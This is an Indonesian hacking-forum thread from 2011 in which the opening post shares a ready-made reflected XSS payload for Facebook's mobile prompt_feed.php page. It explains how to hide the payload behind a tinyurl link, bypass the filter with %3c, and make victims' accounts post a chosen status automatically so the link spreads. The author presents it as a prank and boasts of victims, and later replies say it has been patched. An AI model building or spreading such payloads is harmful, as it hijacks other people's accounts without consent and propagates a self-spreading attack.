Home

About

Milis

Blog Roll

Group Facebook

XCode Magazine

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

Selamat Datang Di Komunitas Yogyafree

Selamat datang di komunitas XCode - Yogyafree - Yogya Family Code. Disini kita saling berbagi ilmu komputer, baik hacking, security, programming, software engineering dan lain sebagainya. Klik disini untuk register

Panel
Welcome! Anonymous

JavaScript Buat Usilin Temen di FACEBOOK [Share]

[ Facebook comments]

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya

JavaScript Buat Usilin Temen di FACEBOOK [Share]

Postby wiLMaR_kiDz » Wed Mar 30, 2011 8:41 am

pernah dapat url yg seperti ini di status fb temen ente??. : tinyurl.com/sampahh dll?..
nah, ane jg tadi(hari ini, tgl ini,bln ini,tahun ini) abis maghrib gak sngaja nglihat salah1 status temen ane yang rasanya ane aja gt, penasaran ya ane klik dong urlnya..wah...apa yang terjadi?.kok abis ke redirect kq malah blank?.
beuh, ane kirain koneksina putus.eh gak taunya ane buka profile, status ane ke-update otomatis yang isinya sama seperti status temen ane tadi..
nah, penasaran dong apa yg terjadi sebenernya...
akhirna ane usut sndiri, ternyata ada beberapa script yang bisa di selipin di facebook..hehehe..
setelah dapet, ane cobain and akhirna berhasil..
oke, kelmaan ceritanya neh, langsung aja..

disini, ane share PoC sederhananya..
cara kerjanya pertama ketika kita klik http://tinyurl.com/xxxxx link ini akan mengarah ke :
Code: Select all
http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt=’


untuk by pass filter < diganti dengan %3c
Code: Select all
%3cscript>window.onload=function(){document.forms[0].message.value=’isi pesan yg akan di update’;document.forms[0].submit();}

isi pesannye silahkan di edit sesuai keinginan ente.. :)

angkah2 pembuatnya akan ane jelaskan seperti dibawah ini :
1. ente buka site sejenis tinyurl.com(buat linknya), lalu buka script pertama tadi di atas and paste-kan di notepad :
Code: Select all
http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt=’


contoh cara bikinnye :
Code: Select all
%3cscript>window.onload=function(){document.forms[0].message.value=’ane akuin, ternyata Wilmar oon emang lebih cool dari yang ane kira..ente liat ajah nih foto ceweknye : http://tinyurl.com/NarsisAhh’;document.forms[0].submit();}


Maka, akan jadilah seperti ini :
Code: Select all
http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='ane akuin, ternyata Wilmar oon emang lebih cool dari yang ane kira..ente liat ajah nih foto ceweknye : http://tinyurl.com/NarsisAhh';document.forms[0].submit();}</script>


nah jadi status temen2 setelah nge-klik link ini : http://tinyurl.com/NarsisAhh akan mengupdate status ente secara otomatis menjadi seperti ini :
ane akuin, ternyata Wilmar oon emang lebih cool dari yang ane kira..ente liat ajah nih foto ceweknye : http://tinyurl.com/NarsisAhh

Contoh korban ane :
Image

oke, ane kira cukup sampe disini aja sharenya...
maaf kalo kurang berbobot, kurang bernutu, gak ada gunanya, alias OMD (Omong Doang) katenye Uncle Jack... :)

salam.

anak o0n
Regards,

Ordinary Human,-
User avatar
wiLMaR_kiDz
 
Posts: 962
Joined: Fri Mar 27, 2009 1:03 pm
Location: Internet

Re: JavaScript Buat Usilin Temen di FACEBOOK [Share]

Postby nesta » Wed Mar 30, 2011 8:50 am

itu bisa di blokir om, itu melalui -> share
itu di klik nanti akan menuju ke tempat semua orang yang kenak beginian ntar pilih blokir di pojok kiri bawah.
maap kalo salah :D
imajinasi jauh lebih penting dari pada pengetahuan
User avatar
nesta
 
Posts: 555
Joined: Fri May 08, 2009 12:17 am

Re: JavaScript Buat Usilin Temen di FACEBOOK [Share]

Postby thekuro_08 » Wed Mar 30, 2011 8:38 pm

bukan kah udah ke patch? :P
User avatar
thekuro_08
 
Posts: 2
Joined: Fri Dec 07, 2007 4:50 pm
Location: warnet yang ga ada virus, terus gue infeksi!

Re: JavaScript Buat Usilin Temen di FACEBOOK [Share]

Postby poni » Wed Mar 30, 2011 8:54 pm

iya. uda di pacth ama fb, tapi dengan script diatas masih bisa bikin diskonek
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
User avatar
poni
 
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia

Re: JavaScript Buat Usilin Temen di FACEBOOK [Share]

Postby thekuro_08 » Wed Mar 30, 2011 8:57 pm

poni wrote:iya. uda di pacth ama fb, tapi dengan script diatas masih bisa bikin diskonek


maksudnya bikin diskonek gimana? -_-
bingung
User avatar
thekuro_08
 
Posts: 2
Joined: Fri Dec 07, 2007 4:50 pm
Location: warnet yang ga ada virus, terus gue infeksi!

Re: JavaScript Buat Usilin Temen di FACEBOOK [Share]

Postby nesta » Wed Mar 30, 2011 11:08 pm

disconnect jaringan kita ya om?? kayaknya pernah dengar tapi gak tau caranya :ngakak:
imajinasi jauh lebih penting dari pada pengetahuan
User avatar
nesta
 
Posts: 555
Joined: Fri May 08, 2009 12:17 am

Re: JavaScript Buat Usilin Temen di FACEBOOK [Share]

Postby b0c4h » Thu Mar 31, 2011 8:58 pm

nesta wrote:disconnect jaringan kita ya om?? kayaknya pernah dengar tapi gak tau caranya :ngakak:

DC jaringan kita kak??bunuh diri donk...:D
apa DC jaringan tmn qt??

.thx.
Love And Peace cannot Created without "RESPECT"
b0c4h
 
Posts: 193
Joined: Tue Aug 21, 2007 6:11 pm
Location: Jack

Re: JavaScript Buat Usilin Temen di FACEBOOK [Share]

Postby plenduz » Fri Apr 01, 2011 8:17 am

manteb nih... coba ahh.. makasih om
plenduz
 
Posts: 7
Joined: Fri Mar 18, 2011 9:06 am

Re: JavaScript Buat Usilin Temen di FACEBOOK [Share]

Postby tabun » Fri Apr 01, 2011 4:46 pm

wahhh,,,,,
tmen ane pernah kna tuh kax,,,,,,
yg parah nya pesennya "ini foto aq waktu lagi ML.."
:ngakak: :ngakak:
orang cupu mau belajar
User avatar
tabun
 
Posts: 41
Joined: Mon Nov 15, 2010 1:28 pm

Re: JavaScript Buat Usilin Temen di FACEBOOK [Share]

Postby Darkzzzz » Sun Apr 03, 2011 5:18 pm

Udah di Patch :p
I'm not A Hacker, But I'm A Image
User avatar
Darkzzzz
 
Posts: 2206
Joined: Fri Jul 27, 2007 1:59 pm
Location: UG-HotZone Depok 4, UG-HotZone Klp2 4 & UG-HotZone WaterFall.

leave a comment

Next

Return to Web Hacking

Who is online

Users browsing this forum: No registered users and 21 guests

Web Counter Start : December 14th 2009
Hit Counters

http://www.xcode.or.id